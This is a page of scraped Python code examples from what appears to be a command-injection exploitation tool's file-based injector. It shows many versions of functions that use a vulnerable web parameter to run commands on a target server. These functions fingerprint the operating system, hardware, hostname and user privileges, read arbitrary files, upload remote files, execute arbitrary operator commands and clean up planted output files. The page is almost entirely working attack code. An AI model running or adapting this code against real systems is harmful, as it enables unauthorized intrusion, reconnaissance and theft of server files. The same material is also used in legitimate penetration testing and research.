Example #1
0
def system_information(separator, payload, TAG, delay, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename):  
  cmd = settings.RECOGNISE_OS     
  response = fb_injector.injection(separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
  target_os = fb_injector.injection_results(url, OUTPUT_TEXTFILE, delay)
  if target_os:
    if menu.options.verbose:
      print ""
    target_os = "".join(str(p) for p in target_os)
    if target_os == "Linux":
      cmd = settings.RECOGNISE_HP
      response = fb_injector.injection(separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
      target_arch = fb_injector.injection_results(url, OUTPUT_TEXTFILE, delay)
      if target_arch:
        if menu.options.verbose:
          print "" 
        target_arch = "".join(str(p) for p in target_arch)
        sys.stdout.write(Style.BRIGHT + "(!) The target operating system is " + Style.UNDERLINE + target_os + Style.RESET_ALL)
        sys.stdout.write(Style.BRIGHT + " and the hardware platform is " + Style.UNDERLINE + target_arch + Style.RESET_ALL + ".\n")
        sys.stdout.flush()
       # Add infos to logs file.   
        output_file = open(filename, "a")
        output_file.write("    (!) The target operating system is " + target_os)
        output_file.write(" and the hardware platform is " + target_arch + ".\n")
        output_file.close()
    else:
      if menu.options.verbose:
        print ""
      sys.stdout.write(Style.BRIGHT + "(!) The target operating system is " + Style.UNDERLINE + target_os + Style.RESET_ALL + ".\n")
      sys.stdout.flush()
      # Add infos to logs file.    
      output_file = open(filename, "a")
      output_file.write("    (!) The target operating system is " + target_os + ".\n")
      output_file.close()
Example #2
0
def system_information(separator, payload, TAG, timesec, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename):    
  if settings.TARGET_OS == "win":
    settings.RECOGNISE_OS = settings.WIN_RECOGNISE_OS
  cmd = settings.RECOGNISE_OS        
  if session_handler.export_stored_cmd(url, cmd, vuln_parameter) == None or menu.options.ignore_session:
    # Command execution results.
    response = fb_injector.injection(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
    # Evaluate injection results.
    target_os = fb_injector.injection_results(url, OUTPUT_TEXTFILE, timesec)
    target_os = "".join(str(p) for p in target_os)
    session_handler.store_cmd(url, cmd, target_os, vuln_parameter)
  else:
    target_os = session_handler.export_stored_cmd(url, cmd, vuln_parameter)
  if target_os:
    target_os = "".join(str(p) for p in target_os)
    if settings.TARGET_OS != "win":
      cmd = settings.DISTRO_INFO
      if session_handler.export_stored_cmd(url, cmd, vuln_parameter) == None or menu.options.ignore_session:
        # Command execution results.
        response = fb_injector.injection(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
        # Perform target page reload (if it is required).
        if settings.URL_RELOAD:
          response = requests.url_reload(url, timesec)
        # Evaluate injection results.
        distro_name = fb_injector.injection_results(url, OUTPUT_TEXTFILE, timesec)
        distro_name = "".join(str(p) for p in distro_name)
        if len(distro_name) != 0:
          target_os = target_os + " (" + distro_name + ")"
        session_handler.store_cmd(url, cmd, target_os, vuln_parameter)
      else:
        target_os = session_handler.export_stored_cmd(url, cmd, vuln_parameter)
    if settings.TARGET_OS == "win":
      cmd = settings.WIN_RECOGNISE_HP
    else:
      cmd = settings.RECOGNISE_HP
    if session_handler.export_stored_cmd(url, cmd, vuln_parameter) == None or menu.options.ignore_session:
      # Command execution results.
      response = fb_injector.injection(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
      # Evaluate injection results.
      target_arch = fb_injector.injection_results(url, OUTPUT_TEXTFILE, timesec)
      target_arch = "".join(str(p) for p in target_arch)
      session_handler.store_cmd(url, cmd, target_arch, vuln_parameter)
    else:
      target_arch = session_handler.export_stored_cmd(url, cmd, vuln_parameter)
    if target_arch:
      # if settings.VERBOSITY_LEVEL != 0:
      #   print("")
      info_msg = "The target operating system is " +  str(target_os) + Style.RESET_ALL  
      info_msg += Style.BRIGHT + " and the hardware platform is " +  str(target_arch)
      sys.stdout.write(settings.print_bold_info_msg(info_msg) + ".\n")
      sys.stdout.flush()
      # Add infos to logs file.   
      output_file = open(filename, "a")
      info_msg = "The target operating system is " + str(target_os)
      info_msg += " and the hardware platform is " + str(target_arch) + ".\n"
      output_file.write(re.compile(re.compile(settings.ANSI_COLOR_REMOVAL)).sub("",settings.INFO_BOLD_SIGN) + info_msg)
      output_file.close()
  else:
    warn_msg = "Heuristics have failed to retrieve the system information."
    print(settings.print_warning_msg(warn_msg))
def system_information(separator, payload, TAG, delay, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename):    
  if settings.TARGET_OS == "win":
    settings.RECOGNISE_OS = settings.WIN_RECOGNISE_OS
  cmd = settings.RECOGNISE_OS        
  response = fb_injector.injection(separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
  target_os = fb_injector.injection_results(url, OUTPUT_TEXTFILE, delay)
  if target_os:
    target_os = "".join(str(p) for p in target_os)
    if settings.TARGET_OS == "win":
      cmd = settings.WIN_RECOGNISE_HP
    else:
      cmd = settings.RECOGNISE_HP
    response = fb_injector.injection(separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
    target_arch = fb_injector.injection_results(url, OUTPUT_TEXTFILE, delay)
    if target_arch:
      if menu.options.verbose:
        print ""
      target_arch = "".join(str(p) for p in target_arch)
      sys.stdout.write(Style.BRIGHT + "(!) The target operating system is " + Style.UNDERLINE + target_os + Style.RESET_ALL)
      sys.stdout.write(Style.BRIGHT + " and the hardware platform is " + Style.UNDERLINE + target_arch + Style.RESET_ALL + ".\n")
      sys.stdout.flush()
      # Add infos to logs file.   
      output_file = open(filename, "a")
      output_file.write("    (!) The target operating system is " + target_os)
      output_file.write(" and the hardware platform is " + target_arch + ".\n")
    output_file.close()
Example #4
0
def system_information(separator, payload, TAG, timesec, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename):    
  if settings.TARGET_OS == "win":
    settings.RECOGNISE_OS = settings.WIN_RECOGNISE_OS
  cmd = settings.RECOGNISE_OS        
  if session_handler.export_stored_cmd(url, cmd, vuln_parameter) == None or menu.options.ignore_session:
    # Command execution results.
    response = fb_injector.injection(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
    # Evaluate injection results.
    target_os = fb_injector.injection_results(url, OUTPUT_TEXTFILE, timesec)
    target_os = "".join(str(p) for p in target_os)
    session_handler.store_cmd(url, cmd, target_os, vuln_parameter)
  else:
    target_os = session_handler.export_stored_cmd(url, cmd, vuln_parameter)
  if target_os:
    target_os = "".join(str(p) for p in target_os)
    if settings.TARGET_OS != "win":
      cmd = settings.DISTRO_INFO
      if session_handler.export_stored_cmd(url, cmd, vuln_parameter) == None or menu.options.ignore_session:
        # Command execution results.
        response = fb_injector.injection(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
        # Perform target page reload (if it is required).
        if settings.URL_RELOAD:
          response = requests.url_reload(url, timesec)
        # Evaluate injection results.
        distro_name = fb_injector.injection_results(url, OUTPUT_TEXTFILE, timesec)
        distro_name = "".join(str(p) for p in distro_name)
        if len(distro_name) != 0:
          target_os = target_os + " (" + distro_name + ")"
        session_handler.store_cmd(url, cmd, target_os, vuln_parameter)
      else:
        target_os = session_handler.export_stored_cmd(url, cmd, vuln_parameter)
    if settings.TARGET_OS == "win":
      cmd = settings.WIN_RECOGNISE_HP
    else:
      cmd = settings.RECOGNISE_HP
    if session_handler.export_stored_cmd(url, cmd, vuln_parameter) == None or menu.options.ignore_session:
      # Command execution results.
      response = fb_injector.injection(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
      # Evaluate injection results.
      target_arch = fb_injector.injection_results(url, OUTPUT_TEXTFILE, timesec)
      target_arch = "".join(str(p) for p in target_arch)
      session_handler.store_cmd(url, cmd, target_arch, vuln_parameter)
    else:
      target_arch = session_handler.export_stored_cmd(url, cmd, vuln_parameter)
    if target_arch:
      # if settings.VERBOSITY_LEVEL >= 1:
      #   print ""
      success_msg = "The target operating system is " +  target_os + Style.RESET_ALL  
      success_msg += Style.BRIGHT + " and the hardware platform is " +  target_arch
      sys.stdout.write(settings.print_success_msg(success_msg) + ".\n")
      sys.stdout.flush()
      # Add infos to logs file.   
      output_file = open(filename, "a")
      success_msg = "The target operating system is " + target_os
      success_msg += " and the hardware platform is " + target_arch + ".\n"
      output_file.write(re.compile(re.compile(settings.ANSI_COLOR_REMOVAL)).sub("",settings.SUCCESS_SIGN) + success_msg)
      output_file.close()
  else:
    warn_msg = "Heuristics have failed to retrieve the system information."
    print settings.print_warning_msg(warn_msg)
Example #5
0
def current_user(separator, payload, TAG, delay, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename):
  if settings.TARGET_OS == "win":
    settings.CURRENT_USER = settings.WIN_CURRENT_USER
  cmd = settings.CURRENT_USER
  response = fb_injector.injection(separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
  if session_handler.export_stored_cmd(url, cmd, vuln_parameter) == None:
    # Evaluate injection results.
    cu_account = fb_injector.injection_results(url, OUTPUT_TEXTFILE, delay)
    cu_account = "".join(str(p) for p in cu_account)
    session_handler.store_cmd(url, cmd, cu_account, vuln_parameter)
  else:
    cu_account = session_handler.export_stored_cmd(url, cmd, vuln_parameter)
  if cu_account:
    # Check if the user have super privileges.
    if menu.options.is_root or menu.options.is_admin:
      if settings.TARGET_OS == "win":
        cmd = settings.IS_ADMIN
      else:  
        cmd = settings.IS_ROOT       
      response = fb_injector.injection(separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
      if session_handler.export_stored_cmd(url, cmd, vuln_parameter) == None:
        # Evaluate injection results.
        shell = fb_injector.injection_results(url, OUTPUT_TEXTFILE, delay)
        shell = "".join(str(p) for p in shell)
        session_handler.store_cmd(url, cmd, shell, vuln_parameter)
      else:
        shell = session_handler.export_stored_cmd(url, cmd, vuln_parameter)
      if menu.options.verbose:
        print ""
      sys.stdout.write(Style.BRIGHT + "(!) The current user is " + Style.UNDERLINE + cu_account + Style.RESET_ALL)
      # Add infos to logs file.    
      output_file = open(filename, "a")
      output_file.write("    (!) The current user is " + cu_account)
      output_file.close()
      if shell:
        if (settings.TARGET_OS == "win" and not "Admin" in shell) or \
           (settings.TARGET_OS != "win" and shell != "0"):
          sys.stdout.write(Style.BRIGHT + " and it is " + Style.UNDERLINE + "not" + Style.RESET_ALL + Style.BRIGHT + " privileged" + Style.RESET_ALL + ".\n")
          sys.stdout.flush()
          # Add infos to logs file.   
          output_file = open(filename, "a")
          output_file.write(" and it is not privileged.\n")
          output_file.close()
        else:
          sys.stdout.write(Style.BRIGHT + " and it is " + Style.UNDERLINE + Style.RESET_ALL + Style.BRIGHT + "privileged" + Style.RESET_ALL + ".\n")
          sys.stdout.flush()
          # Add infos to logs file.   
          output_file = open(filename, "a")
          output_file.write(" and it is privileged.\n")
          output_file.close()
    else:
      if menu.options.verbose:
        print ""
      sys.stdout.write(Style.BRIGHT + "(!) The current user is " + Style.UNDERLINE + cu_account + Style.RESET_ALL + ".\n")
      sys.stdout.flush()
      # Add infos to logs file.   
      output_file = open(filename, "a")
      output_file.write("    (!) The current user is " + cu_account + "\n")
      output_file.close()
Example #6
0
def system_information(separator, payload, TAG, timesec, prefix, suffix,
                       whitespace, http_request_method, url, vuln_parameter,
                       OUTPUT_TEXTFILE, alter_shell, filename):
    if settings.TARGET_OS == "win":
        settings.RECOGNISE_OS = settings.WIN_RECOGNISE_OS
    cmd = settings.RECOGNISE_OS
    response = fb_injector.injection(separator, payload, TAG, cmd, prefix,
                                     suffix, whitespace, http_request_method,
                                     url, vuln_parameter, OUTPUT_TEXTFILE,
                                     alter_shell, filename)
    if session_handler.export_stored_cmd(url, cmd, vuln_parameter) == None:
        # Evaluate injection results.
        target_os = fb_injector.injection_results(url, OUTPUT_TEXTFILE,
                                                  timesec)
        target_os = "".join(str(p) for p in target_os)
        session_handler.store_cmd(url, cmd, target_os, vuln_parameter)
    else:
        target_os = session_handler.export_stored_cmd(url, cmd, vuln_parameter)
    if target_os:
        if settings.TARGET_OS == "win":
            cmd = settings.WIN_RECOGNISE_HP
        else:
            cmd = settings.RECOGNISE_HP
        response = fb_injector.injection(separator, payload, TAG, cmd, prefix,
                                         suffix, whitespace,
                                         http_request_method, url,
                                         vuln_parameter, OUTPUT_TEXTFILE,
                                         alter_shell, filename)
        if session_handler.export_stored_cmd(url, cmd, vuln_parameter) == None:
            # Evaluate injection results.
            target_arch = fb_injector.injection_results(
                url, OUTPUT_TEXTFILE, timesec)
            target_arch = "".join(str(p) for p in target_arch)
            session_handler.store_cmd(url, cmd, target_arch, vuln_parameter)
        else:
            target_arch = session_handler.export_stored_cmd(
                url, cmd, vuln_parameter)
        if target_arch:
            if settings.VERBOSITY_LEVEL >= 1:
                print ""
            success_msg = "The target operating system is " + target_os + Style.RESET_ALL
            success_msg += Style.BRIGHT + " and the hardware platform is " + target_arch
            sys.stdout.write(settings.print_success_msg(success_msg) + ".\n")
            sys.stdout.flush()
            # Add infos to logs file.
            output_file = open(filename, "a")
            success_msg = "The target operating system is " + target_os
            success_msg += " and the hardware platform is " + target_arch + ".\n"
            output_file.write(
                re.compile(re.compile(settings.ANSI_COLOR_REMOVAL)).sub(
                    "", settings.SUCCESS_SIGN) + success_msg)
            output_file.close()
    else:
        warn_msg = "Heuristics have failed to retrieve the system information."
        print settings.print_warning_msg(warn_msg)
Example #7
0
def file_upload(separator, payload, TAG, timesec, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename):
  if settings.TARGET_OS == "win":
    # Not yet implemented
    pass
  else:
    file_to_upload = menu.options.file_upload
    # check if remote file exists.
    try:
      urllib2.urlopen(file_to_upload)
    except urllib2.HTTPError as err_msg:
      warn_msg = "It seems that the '" + file_to_upload + "' file, does not exist. (" +str(err_msg)+ ")"
      sys.stdout.write(settings.print_warning_msg(warn_msg) + "\n")
      sys.stdout.flush()
      raise SystemExit()
    except ValueError as err_msg:
      err_msg = str(err_msg[0]).capitalize() + str(err_msg)[1]
      sys.stdout.write(settings.print_critical_msg(err_msg) + "\n")
      sys.stdout.flush()
      raise SystemExit() 
      
    # Check the file-destination
    if os.path.split(menu.options.file_dest)[1] == "" :
      dest_to_upload = os.path.split(menu.options.file_dest)[0] + "/" + os.path.split(menu.options.file_upload)[1]
    elif os.path.split(menu.options.file_dest)[0] == "/":
      dest_to_upload = "/" + os.path.split(menu.options.file_dest)[1] + "/" + os.path.split(menu.options.file_upload)[1]
    else:
      dest_to_upload = menu.options.file_dest
      
    # Execute command
    cmd = settings.FILE_UPLOAD + file_to_upload + " -O " + dest_to_upload 
    response = fb_injector.injection(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
    shell = fb_injector.injection_results(url, OUTPUT_TEXTFILE, timesec)
    shell = "".join(str(p) for p in shell)
    
    # Check if file exists!
    if settings.TARGET_OS == "win":
      cmd = "dir " + dest_to_upload + ")"
    else:  
      cmd = "echo $(ls " + dest_to_upload + ")"
    response = fb_injector.injection(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
    shell = fb_injector.injection_results(url, OUTPUT_TEXTFILE, timesec)
    shell = "".join(str(p) for p in shell)
    if shell:
      if settings.VERBOSITY_LEVEL >= 1:
        print("")
      success_msg = "The " +  shell
      success_msg += Style.RESET_ALL + Style.BRIGHT + " file was uploaded successfully!" 
      sys.stdout.write(settings.print_success_msg(success_msg) + "\n")
      sys.stdout.flush()
    else:
      warn_msg = "It seems that you don't have permissions to "
      warn_msg += "write the '" + dest_to_upload + "' file."  
      sys.stdout.write(settings.print_warning_msg(warn_msg) + "\n")
      sys.stdout.flush()
def current_user(separator, payload, TAG, delay, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename):
  if settings.TARGET_OS == "win":
    settings.CURRENT_USER = settings.WIN_CURRENT_USER
  cmd = settings.CURRENT_USER
  response = fb_injector.injection(separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
  cu_account = fb_injector.injection_results(url, OUTPUT_TEXTFILE, delay)
  if cu_account:
    cu_account = "".join(str(p) for p in cu_account)
    # Check if the user have super privileges.
    if menu.options.is_root or menu.options.is_admin:
      if settings.TARGET_OS == "win":
        cmd = settings.IS_ADMIN
        if not alter_shell:
          cmd = "\"" + cmd + "\"" 
      else:  
        cmd = settings.IS_ROOT       
      response = fb_injector.injection(separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
      shell = fb_injector.injection_results(url, OUTPUT_TEXTFILE, delay)
      if menu.options.verbose:
        print ""
      sys.stdout.write(Style.BRIGHT + "(!) The current user is " + Style.UNDERLINE + cu_account + Style.RESET_ALL)
      # Add infos to logs file.    
      output_file = open(filename, "a")
      output_file.write("    (!) The current user is " + cu_account)
      output_file.close()
      if shell:
        shell = "".join(str(p) for p in shell)
        if (settings.TARGET_OS == "win" and not "Admin" in shell) or \
           (settings.TARGET_OS != "win" and shell != "0"):
          sys.stdout.write(Style.BRIGHT + " and it is " + Style.UNDERLINE + "not" + Style.RESET_ALL + Style.BRIGHT + " privileged" + Style.RESET_ALL + ".\n")
          sys.stdout.flush()
          # Add infos to logs file.   
          output_file = open(filename, "a")
          output_file.write(" and it is not privileged.\n")
          output_file.close()
        else:
          sys.stdout.write(Style.BRIGHT + " and it is " + Style.UNDERLINE + Style.RESET_ALL + Style.BRIGHT + "privileged" + Style.RESET_ALL + ".\n")
          sys.stdout.flush()
          # Add infos to logs file.   
          output_file = open(filename, "a")
          output_file.write(" and it is privileged.\n")
          output_file.close()
    else:
      if menu.options.verbose:
        print ""
      sys.stdout.write(Style.BRIGHT + "(!) The current user is " + Style.UNDERLINE + cu_account + Style.RESET_ALL + ".\n")
      sys.stdout.flush()
      # Add infos to logs file.   
      output_file = open(filename, "a")
      output_file.write("    (!) The current user is " + cu_account + "\n")
      output_file.close()
Example #9
0
def file_upload(separator, payload, TAG, delay, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename):
  if settings.TARGET_OS == "win":
    # Not yet implemented
    pass
  else:
    file_to_upload = menu.options.file_upload
    # check if remote file exists.
    try:
      urllib2.urlopen(file_to_upload)
    except urllib2.HTTPError, err_msg:
      warn_msg = "It seems that the '" + file_to_upload + "' file, does not exists. (" +str(err_msg)+ ")"
      sys.stdout.write(settings.print_warning_msg(warn_msg) + "\n")
      sys.stdout.flush()
      sys.exit(0)
      
    # Check the file-destination
    if os.path.split(menu.options.file_dest)[1] == "" :
      dest_to_upload = os.path.split(menu.options.file_dest)[0] + "/" + os.path.split(menu.options.file_upload)[1]
    elif os.path.split(menu.options.file_dest)[0] == "/":
      dest_to_upload = "/" + os.path.split(menu.options.file_dest)[1] + "/" + os.path.split(menu.options.file_upload)[1]
    else:
      dest_to_upload = menu.options.file_dest
      
    # Execute command
    cmd = settings.FILE_UPLOAD + file_to_upload + " -O " + dest_to_upload 
    response = fb_injector.injection(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
    shell = fb_injector.injection_results(url, OUTPUT_TEXTFILE, delay)
    shell = "".join(str(p) for p in shell)
    
    # Check if file exists!
    if settings.TARGET_OS == "win":
      cmd = "dir " + dest_to_upload + ")"
    else:  
      cmd = "echo $(ls " + dest_to_upload + ")"
    response = fb_injector.injection(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
    shell = fb_injector.injection_results(url, OUTPUT_TEXTFILE, delay)
    shell = "".join(str(p) for p in shell)
    if shell:
      if settings.VERBOSITY_LEVEL >= 1:
        print ""
      success_msg = "The " +  shell
      success_msg += Style.RESET_ALL + Style.BRIGHT + " file was uploaded successfully!" 
      sys.stdout.write(settings.print_success_msg(success_msg) + "\n")
      sys.stdout.flush()
    else:
      warn_msg = "It seems that you don't have permissions to "
      warn_msg += "write the '" + dest_to_upload + "' file."  
      sys.stdout.write(settings.print_warning_msg(warn_msg) + "\n")
      sys.stdout.flush()
Example #10
0
def file_read(separator, payload, TAG, timesec, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename):
  file_to_read = menu.options.file_read
  # Execute command
  if settings.TARGET_OS == "win":
    cmd = settings.WIN_FILE_READ + file_to_read
  else:
    cmd = settings.FILE_READ + file_to_read
  if session_handler.export_stored_cmd(url, cmd, vuln_parameter) == None or menu.options.ignore_session:
    # Command execution results.
    response = fb_injector.injection(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
    # Evaluate injection results.
    shell = fb_injector.injection_results(url, OUTPUT_TEXTFILE, timesec)
    shell = "".join(str(p) for p in shell)
    session_handler.store_cmd(url, cmd, shell, vuln_parameter)
  else:
    shell = session_handler.export_stored_cmd(url, cmd, vuln_parameter)
  if settings.VERBOSITY_LEVEL != 0 and menu.options.ignore_session:
    print(settings.SINGLE_WHITESPACE)
  if shell:
    info_msg = "The contents of file '"  
    info_msg += file_to_read + "'" + Style.RESET_ALL + ": "
    sys.stdout.write(settings.print_bold_info_msg(info_msg))
    print(shell)
    output_file = open(filename, "a")
    info_msg = "The contents of file '"
    info_msg += file_to_read + "' : " + shell + ".\n"
    output_file.write(re.compile(re.compile(settings.ANSI_COLOR_REMOVAL)).sub("",settings.INFO_BOLD_SIGN) + info_msg)
    output_file.close()
  else:
    warn_msg = "It seems that you don't have permissions "
    warn_msg += "to read the '" + file_to_read + "' file."
    sys.stdout.write(settings.print_warning_msg(warn_msg) + "\n")
    sys.stdout.flush()
Example #11
0
def delete_previous_shell(separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename):
  if settings.TARGET_OS == "win":
    cmd = settings.WIN_DEL + OUTPUT_TEXTFILE + " " + separator + settings.WIN_COMMENT
  else: 
    settings.SRV_ROOT_DIR = ""
    cmd = settings.DEL + settings.SRV_ROOT_DIR + OUTPUT_TEXTFILE
  response = fb_injector.injection(separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
Example #12
0
def file_read(separator, payload, TAG, delay, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename):
  file_to_read = menu.options.file_read
  # Execute command
  if settings.TARGET_OS == "win":
    cmd = settings.WIN_FILE_READ + file_to_read
  else:
    cmd = settings.FILE_READ + file_to_read 
  response = fb_injector.injection(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
  if session_handler.export_stored_cmd(url, cmd, vuln_parameter) == None:
    # Evaluate injection results.
    shell = fb_injector.injection_results(url, OUTPUT_TEXTFILE, delay)
    shell = "".join(str(p) for p in shell)
    session_handler.store_cmd(url, cmd, shell, vuln_parameter)
  else:
    shell = session_handler.export_stored_cmd(url, cmd, vuln_parameter)
  if settings.VERBOSITY_LEVEL >= 1:
    print ""
  if shell:
    success_msg = "The contents of file '"  
    success_msg += file_to_read + "'" + Style.RESET_ALL + ": "
    sys.stdout.write(settings.print_success_msg(success_msg))
    print shell
    output_file = open(filename, "a")
    success_msg = "The contents of file '"
    success_msg += file_to_read + "' : " + shell + ".\n"
    output_file.write("    " + re.compile(re.compile(settings.ANSI_COLOR_REMOVAL)).sub("",settings.SUCCESS_SIGN) + success_msg)
    output_file.close()
  else:
    warn_msg = "It seems that you don't have permissions "
    warn_msg += "to read the '" + file_to_read + "' file."
    sys.stdout.write(settings.print_warning_msg(warn_msg) + "\n")
    sys.stdout.flush()
Example #13
0
def powershell_version(separator, payload, TAG, delay, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename): 
  cmd = settings.PS_VERSION
  if alter_shell:
    cmd = cmd.replace("'","\\'")
  #Command execution results.
  response = fb_injector.injection(separator, payload, TAG, cmd, prefix, suffix, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
  # Evaluate injection results.
  if session_handler.export_stored_cmd(url, cmd, vuln_parameter) == None:
    # Evaluate injection results.
    ps_version = fb_injector.injection_results(url, OUTPUT_TEXTFILE, delay)
    ps_version = "".join(str(p) for p in ps_version)
    session_handler.store_cmd(url, cmd, ps_version, vuln_parameter)
  else:
    ps_version = session_handler.export_stored_cmd(url, cmd, vuln_parameter)
  try:
    if float(ps_version):
      settings.PS_ENABLED = True
      if menu.options.verbose:
        print ""
      # Output PowerShell's version number
      sys.stdout.write(Style.BRIGHT + "(!) The PowerShell's version number is " + Style.UNDERLINE +  ps_version + Style.RESET_ALL + Style.BRIGHT + Style.RESET_ALL + ".\n")
      sys.stdout.flush()
      # Add infos to logs file. 
      output_file = open(filename, "a")
      output_file.write("    (!) The PowerShell's version number is " + ps_version + ".\n")
      output_file.close()
  except ValueError:
    print Fore.YELLOW + settings.WARNING_SIGN + "Heuristics have failed to identify PowerShell's version, which means that some payloads or injection techniques may be failed." + Style.RESET_ALL 
    settings.PS_ENABLED = False
Example #14
0
def hostname(separator, payload, TAG, timesec, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename):
  if settings.TARGET_OS == "win":
    settings.HOSTNAME = settings.WIN_HOSTNAME 
  cmd = settings.HOSTNAME
  if session_handler.export_stored_cmd(url, cmd, vuln_parameter) == None or menu.options.ignore_session:
    # Command execution results.
    response = fb_injector.injection(separator, payload, TAG, cmd, prefix, suffix, whitespace, http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE, alter_shell, filename)
    # Evaluate injection results.
    shell = fb_injector.injection_results(url, OUTPUT_TEXTFILE, timesec)
    shell = "".join(str(p) for p in shell)
    session_handler.store_cmd(url, cmd, shell, vuln_parameter)
  else:
    shell = session_handler.export_stored_cmd(url, cmd, vuln_parameter)
  if shell:
    # if settings.VERBOSITY_LEVEL >= 1:
    #   print ""
    success_msg = "The hostname is " +  shell
    sys.stdout.write(settings.print_success_msg(success_msg) + ".\n")
    sys.stdout.flush()
    # Add infos to logs file. 
    output_file = open(filename, "a")
    success_msg = "The hostname is " + shell + ".\n"
    output_file.write(re.compile(re.compile(settings.ANSI_COLOR_REMOVAL)).sub("",settings.SUCCESS_SIGN) + success_msg)
    output_file.close()
  else:
    warn_msg = "Heuristics have failed to identify the hostname."
    print settings.print_warning_msg(warn_msg)
Example #15
0
def single_os_cmd_exec(separator, payload, TAG, timesec, prefix, suffix,
                       whitespace, http_request_method, url, vuln_parameter,
                       OUTPUT_TEXTFILE, alter_shell, filename):
    cmd = menu.options.os_cmd
    if session_handler.export_stored_cmd(
            url, cmd, vuln_parameter) == None or menu.options.ignore_session:
        # Command execution results.
        response = fb_injector.injection(separator, payload, TAG, cmd, prefix,
                                         suffix, whitespace,
                                         http_request_method, url,
                                         vuln_parameter, OUTPUT_TEXTFILE,
                                         alter_shell, filename)
        # Evaluate injection results.
        shell = fb_injector.injection_results(url, OUTPUT_TEXTFILE, timesec)
        shell = "".join(str(p) for p in shell)
        session_handler.store_cmd(url, cmd, shell, vuln_parameter)
    else:
        shell = session_handler.export_stored_cmd(url, cmd, vuln_parameter)
    if shell:
        if shell != "":
            print("\n" + Fore.GREEN + Style.BRIGHT + shell + Style.RESET_ALL +
                  "\n")
            logs.print_logs_notification(filename, url)
        else:
            err_msg = "The '" + cmd + "' command, does not return any output."
            print(settings.print_critical_msg(err_msg))
        raise SystemExit()
Example #16
0
def hostname(separator, payload, TAG, delay, prefix, suffix, whitespace,
             http_request_method, url, vuln_parameter, OUTPUT_TEXTFILE,
             alter_shell, filename):
    if settings.TARGET_OS == "win":
        settings.HOSTNAME = settings.WIN_HOSTNAME
    cmd = settings.HOSTNAME
    response = fb_injector.injection(separator, payload, TAG, cmd, prefix,
                                     suffix, whitespace, http_request_method,
                                     url, vuln_parameter, OUTPUT_TEXTFILE,
                                     alter_shell, filename)
    if session_handler.export_stored_cmd(url, cmd, vuln_parameter) == None:
        # Evaluate injection results.
        shell = fb_injector.injection_results(url, OUTPUT_TEXTFILE, delay)
        shell = "".join(str(p) for p in shell)
        session_handler.store_cmd(url, cmd, shell, vuln_parameter)
    else:
        shell = session_handler.export_stored_cmd(url, cmd, vuln_parameter)
    if shell:
        if settings.VERBOSITY_LEVEL >= 1:
            print ""
        success_msg = "The hostname is " + shell
        sys.stdout.write(settings.print_success_msg(success_msg) + ".\n")
        sys.stdout.flush()
        # Add infos to logs file.
        output_file = open(filename, "a")
